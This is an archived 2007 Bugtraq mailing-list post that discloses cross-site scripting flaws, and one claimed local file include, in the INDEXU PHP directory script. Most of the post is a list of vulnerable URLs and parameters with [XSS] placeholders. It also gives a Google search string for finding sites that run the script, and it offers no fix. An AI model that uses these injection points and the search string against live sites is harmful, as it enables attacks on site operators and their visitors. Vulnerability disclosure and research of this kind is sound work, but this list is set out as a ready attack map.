lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 16 Jan 2007 19:51:52 -0000
From: gamr-14@...mail.com
To: bugtraq@...urityfocus.com
Subject: vulnerability script indexu all versions

vulnerability script indexu all versions
Found by :SwEET-DeViL & viP HaCkEr & HaCkEr sUn
TeaM AL-GaRNi
Application : indexu
version : all versions
URL : http://www.nicecoder.com/
google : "Powered by INDEXU 5."

Exploits :
|//1\\|
in upgrade.php
http://www.site.com/INDEXU_PATH/upgrade.php?pflag=upgrade&true&gateway=[XSS] ___or #../index.php
AND Local File Include~
##########################
|//2\\|
in suggest_category.php
http://www.site.com/INDEXU_PATH/suggest_category.php?error_msg=[XSS]
##########################
|//3\\|
in user_detail.php
http://www.site.com/INDEXU_PATH/user_detail.php?u=[XSS]
##########################
|//4\\|
in tell_friend.php
http://www.site.com/INDEXU_PATH/tell_friend.php?friend_name=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?friend_email=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?error_msg=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?my_name=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?my_email=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?id=[XSS]
##########################
|//5\\|
in sendmail.php
http://www.site.com/INDEXU_PATH/sendmail.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/sendmail.php?email=[XSS]
http://www.site.com/INDEXU_PATH/sendmail.php?name=[XSS]
http://www.site.com/INDEXU_PATH/sendmail.php?subject=[XSS]
##########################
//6\\
in send_pwd.php
http://www.site.com/INDEXU_PATH/send_pwd.php?email=[XSS]
http://www.site.com/INDEXU_PATH/send_pwd.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/send_pwd.php?username=[XSS]
##########################
|//7\\|
in search.php
http://www.site.com/INDEXU_PATH/search.php?keyword=[XSS]
##########################
|//8\\|
http://www.site.com/INDEXU_PATH/register.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/register.php?username=[XSS]
http://www.site.com/INDEXU_PATH/register.php?password=[XSS]
http://www.site.com/INDEXU_PATH/register.php?password2=[XSS]
http://www.site.com/INDEXU_PATH/register.php?email=[XSS]
##########################
|//9\\|
power_search.php
http://www.site.com/INDEXU_PATH/power_search.php?url=[XSS]
http://www.site.com/INDEXU_PATH//power_search.php?contact_name=[XSS]
http://www.site.com/INDEXU_PATH//power_search.php?email=[XSS]
##########################
|//10\\|
in new.php
http://www.site.com/INDEXU_PATH/new.php?path=[XSS]
http://www.site.com/INDEXU_PATH//new.php?total=[XSS]
##########################
|//11\\|
in modify.php
http://www.site.com/INDEXU_PATH/modify.php?pflag=search&query=[XSS]
##########################
|//12\\|
in mailing_list.php
http://www.site.com/INDEXU_PATH/mailing_list.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/mailing_list.php?email=[XSS]
##########################
|//13\\|
in login.php
http://www.site.com/INDEXU_PATH/login.php?error_msg=[XSS]
##########################
|//...$...\\|
There is another vulnerability in the program, a XSS
:::::::::::::::::::::::::::::::::
:: ###########     ########### ::
:: ###########     ########### ::
:: ###             ###     ### ::
:: ###             ########### ::
:: ###   ######    ########### ::
:: ###   ## ### == ###  ###    ::
:: ###      ### == ###   ###   ::
:: ############    ###    ###  ::
:: ############    ###    ###  ::
:::::::::::::::::::::::::::::::::
##########################
#####gamr-14@...mail.com##
#####Error@....com########
########(c)2007###########

Powered by blists - more mailing lists